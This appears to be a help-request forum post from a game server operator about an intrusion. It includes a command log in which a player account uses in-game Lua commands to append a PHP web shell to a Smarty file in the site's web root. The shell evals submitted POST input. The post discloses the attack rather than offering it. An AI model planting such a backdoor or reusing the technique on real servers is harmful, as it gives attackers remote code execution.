hello guys i got big question which made me get crazy!
someone in somehow did hack my server and did use lua cmd IN GAME to upload a file inside my website to hack my server and make everyone at server a GM!
look at this : i found it on DoCommand ( Commands Log )
[03-24 02:57:25][ExecWork]Cha-Chibi+533: lua haxfilename = "C:\\Program Files (x86)\\Zend\\Apache2\\htdocs\\classes\\smarty\\internals\\core.smarty.php"
[03-24 02:57:32][ExecWork]Cha-Chibi+533: lua if(fileexists(haxfilename) ~= false) then haxfile = io.open(haxfilename,'a');end
[03-24 02:57:38][ExecWork]Cha-Chibi+533: lua haxfile:write("<?php $query = stripslashes($_POST[\'query\']);")
[03-24 02:57:43][ExecWork]Cha-Chibi+533: lua haxfile:write("eval($query); ;?> <form method=\"POST\" action=\"<?PHP echo stripslashes($_SERVER[\'PHP_SELF\']);?>")
[03-24 02:57:47][ExecWork]Cha-Chibi+533: lua haxfile:write("\" accept-charset=\"UTF-8\">")
[03-24 02:57:51][ExecWork]Cha-Chibi+533: lua haxfile:write(" <textarea name=\"query\" cols=\"48\" rows=\"8\" ></textarea>")
[03-24 02:57:55][ExecWork]Cha-Chibi+533: lua haxfile:write("<p><input type=\"submit\" value=\"Submit\"></p></form>")
[03-24 02:57:59][ExecWork]Cha-Chibi+533: lua haxfile:close()